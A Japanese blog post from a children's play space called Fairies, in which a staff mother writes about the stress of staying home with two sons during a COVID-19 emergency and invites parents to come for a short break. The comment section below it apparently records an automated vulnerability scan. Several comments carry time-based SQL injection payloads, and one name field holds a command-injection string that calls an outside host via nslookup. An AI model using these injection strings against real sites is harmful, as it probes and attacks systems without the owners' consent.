【トッシー】心のゆとり

こんばんは🌙


スタッフトッシーです😊


47日に緊急事態宣言が発出され、そこから外出自粛の要請を受け、それぞれのお家時間をお過ごしの事と思います。


我家は緊急事態宣言をする前から自主的に外出自粛をしていた為、既に発出されたときには完全に精神の限界を迎えていました😱


とても広いとは言えない自宅。自宅周りで遊べるスペースなど無く、毎日朝から晩まで3年生と1年生の男の子2人と自宅の中で過ごし、喧嘩や激しい遊びに完全に精神的に参っていました😅


今後どうなるかわからないウイルスに不安を抱き完全に思考力が低下し、鬱の一歩手前💦


でもストレスが溜まっているのは間違いなく私だけではなく、子供達も同じで、そんな子供達とどう向き合うかを必死に考え、いつもいつも怒ってばかりのお母さんよりも、母親として、色んなことを容認する事も必要だと、小さい事に一喜一憂する事をやめる事にしました(普段は怒りん坊おかあさんです。。。笑)


時にはノイズキャンセリング機能の付いたヘッドホンで音楽を聴いたり、


普段は制限のあるゲームの制限を少し緩める事をしたり、


保育の現場にいる身としてはあるまじき事も多々あったかと思います


でも、私もそうですが、子供との関わりや過ごし方ばかりに一生懸命になり、自分自身がストレスを抱えて、メンタルが崩壊寸前の方は多いんじゃ無いかな?と思ってます。


あれ?もしかして私だけ?笑


元々家にいる事が苦手な私は例え家族とは言え、毎日子供と家に引き籠ると言うことがどれほど大変なことか、しみじみと感じています


ましてや普段いないパートナーがリモートワークや休業となれば、そこへの配慮も必要になり、更に気持ちの浮き沈みも激しくなるのでは無いかと思います


最近ニュースでも話題になってる家族間のトラブルも、自粛から来るものだと思うのですが、子育てや家庭の事に頑張っているお母さんはきっと自分自身を労る時間も、気持ちにも余裕がなくなっているのでは無いかと心配しています


そんな私も昨日は子供達とFairiesに遊びに行ってきました!


少しの時間ですが、子供達は貸し切りの中普段家では遊べない遊びをしたり、レゴブロックで集中して作品作りをし、私は母であるみゆきちゃんと色々話をしたり


息抜きには、その少しの時間がとても貴重でした😊


自粛をしていれば、大人と話すことはあまりなくなるので、久々にゆっくり大人と話をし、こんなにも誰かと話をすると言う事がとても大事な事なのかと普段ではあまり気づかない事に改めて気づかされました。


平日Fairiesはひっそりとオープンしています!


子供の遊び場だけではなく、大人のお話の場としても、その時間は貸し切り状態になりますので、1時間でも息抜きに来る事で、皆様の心のゆとりが保てる場になれればと思っています!


どんな小さなことでもご相談ください😊


もちろんお父さんとの親子の遊び場も歓迎です😆✨


自粛の中この様な発信をする事で外出を促す事になるのではないかと躊躇しましたが、

1時間でも別な場所で息抜きをする事で心のゆとりができ、まだまだ先が長い自粛のほんの少しのサポートができればと思ってます。


行き詰まる前に、Fairiesがあることをどこか頭の隅に置いてもらえると嬉しいです😊

コメントをお書きください

コメント: 38
  • #1

    DExWtSbs (日曜日, 08 8月 2021 03:14)

    1

  • #2

    DExWtSbs (日曜日, 08 8月 2021 03:16)

    1

  • #3

    DExWtSbs (日曜日, 08 8月 2021 03:17)

    1

  • #4

    DExWtSbs (日曜日, 08 8月 2021 03:17)

    1

  • #5

    DExWtSbs (日曜日, 08 8月 2021 03:17)

    1

  • #6

    $(nslookup hitlcninquwvp83cf3.bxss.me||perl -e "gethostbyname('hitlcninquwvp83cf3.bxss.me')") (日曜日, 08 8月 2021 03:17)

    1

  • #7

    DExWtSbs (日曜日, 08 8月 2021 03:17)

    1

  • #8

    DExWtSbs (日曜日, 08 8月 2021 03:18)

    1

  • #9

    DExWtSbs (日曜日, 08 8月 2021 03:19)

    0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • #10

    DExWtSbs (日曜日, 08 8月 2021 03:19)

    3MUIE2jE'; waitfor delay '0:0:15' --

  • #11

    DExWtSbs (日曜日, 08 8月 2021 03:20)

    SmXgfGfU') OR 359=(SELECT 359 FROM PG_SLEEP(15))--

  • #12

    DExWtSbs (日曜日, 08 8月 2021 03:20)

    1

  • #13

    DExWtSbs (日曜日, 08 8月 2021 03:21)

    1

  • #14

    DExWtSbs (日曜日, 08 8月 2021 03:21)

    1

  • #15

    DExWtSbs (日曜日, 08 8月 2021 03:22)

    1

  • #16

    DExWtSbs (日曜日, 08 8月 2021 03:23)

    1

  • #17

    DExWtSbs (日曜日, 08 8月 2021 03:23)

    1

  • #18

    DExWtSbs (日曜日, 08 8月 2021 03:24)

    1

  • #19

    DExWtSbs (日曜日, 08 8月 2021 03:24)

    1

  • #20

    DExWtSbs (日曜日, 08 8月 2021 03:28)

    1

  • #21

    0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z (日曜日, 08 8月 2021 03:28)

    1

  • #22

    Dy8UxEk7' OR 104=(SELECT 104 FROM PG_SLEEP(15))-- (日曜日, 08 8月 2021 03:29)

    1

  • #23

    DExWtSbs (日曜日, 08 8月 2021 03:30)

    1

  • #24

    DExWtSbs (日曜日, 08 8月 2021 03:30)

    1

  • #25

    DExWtSbs (日曜日, 08 8月 2021 03:31)

    1

  • #26

    DExWtSbs (日曜日, 08 8月 2021 03:31)

    1

  • #27

    DExWtSbs (日曜日, 08 8月 2021 03:32)

    1

  • #28

    DExWtSbs (日曜日, 08 8月 2021 03:33)

    1

  • #29

    DExWtSbs (日曜日, 08 8月 2021 03:36)

    1

  • #30

    DExWtSbs (日曜日, 08 8月 2021 03:36)

    1

  • #31

    DExWtSbs (日曜日, 08 8月 2021 03:37)

    1

  • #32

    DExWtSbs (日曜日, 08 8月 2021 03:37)

    1

  • #33

    DExWtSbs (日曜日, 08 8月 2021 03:38)

    1

  • #34

    DExWtSbs (日曜日, 08 8月 2021 03:38)

    1

  • #35

    DExWtSbs (日曜日, 08 8月 2021 03:39)

    1

  • #36

    DExWtSbs (日曜日, 08 8月 2021)

    1

  • #37

    DExWtSbs (日曜日, 08 8月 2021 03:40)

    1

  • #38

    DExWtSbs (日曜日, 08 8月 2021 03:43)

    1